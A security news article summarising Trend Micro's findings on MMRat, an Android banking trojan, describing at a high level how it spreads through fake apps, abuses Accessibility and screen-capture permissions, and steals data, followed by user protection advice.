MMRat’s primary focus is on conducting bank fraud. The attack relies on the victim downloading and installing the malware on their device and granting it the required permissions. Once done, the malware quickly establishes communication with its remote server, sending copious amounts of data, including personal and mobile data, keylogging data, device status, etc.

Moreover, the malware operator can remotely turn on the device when not in use, unlock the screen, and carry out bank fraud. They may also capture screens for server-size visualization. After performing its malicious tasks, MMRat can self-uninstall and remove every trace of the manipulation.

Attack Sequence (Trend Micro)

**MMRat Capabilities**

As mentioned above, MMRat is a highly capable malware that can capture user input/screen content and allow remote control of the device. Relying on the Android Accessibility service and MediaProjection API for its functioning, the malware can easily detect when the device is on or off and reboot it by registering a receiver on the system.

Furthermore, the trojan avoids suspicion by disguising itself as an official government or dating app and enters the victim’s device through a phishing website. It also launches a 1×1-sized pixel activity to stay persistent.

**What Data Does it Collect?**

According to Trend Micro’s blog post, MMRat can collect extensive device and personal data such as screen and battery data such as whether the screen is locked and current activities, installed apps, contact lists, and network data, e.g., signal strength and network type.

The Android trojan also schedules a time task to collect data at regular intervals. This timer executes every second, and the counter resets every 60 seconds. It looks for victims’ contact lists and installed app info to get maximum personal details. 

After obtaining Accessibility permission, it can obtain extended permission and modify device settings by bypassing user intervention. It is also interested in lock screen patterns, which it collects when the victim unlocks the device and sends it to the C2 server so that the malware operator can unlock the device when desired.

What’s worse, it captures real-time screen content and streams it to a remote server via the MediaProjection API. MMRat also uses the “user terminal state” approach for capturing screen data, in which it doesn’t record the screen as a video but dumps the child nodes in Windows every second.

**How to Stay Protected?**

Users must download apps from trusted platforms like Google Play Store or Apple App Store and avoid suspicious websites posing as app stores. It is equally important to keep updating device software to mitigate security threats like MMRat. Lastly, be very careful when granting Accessibility permissions to an app.

**RELATED ARTICLES**

1.  WhatsApp Pink is malware spreading through group chats
2.  Android apps on APKPure store caught spreading malware
3.  Fake reviews & third-party apps cause 50% of Android threats

Tag

#google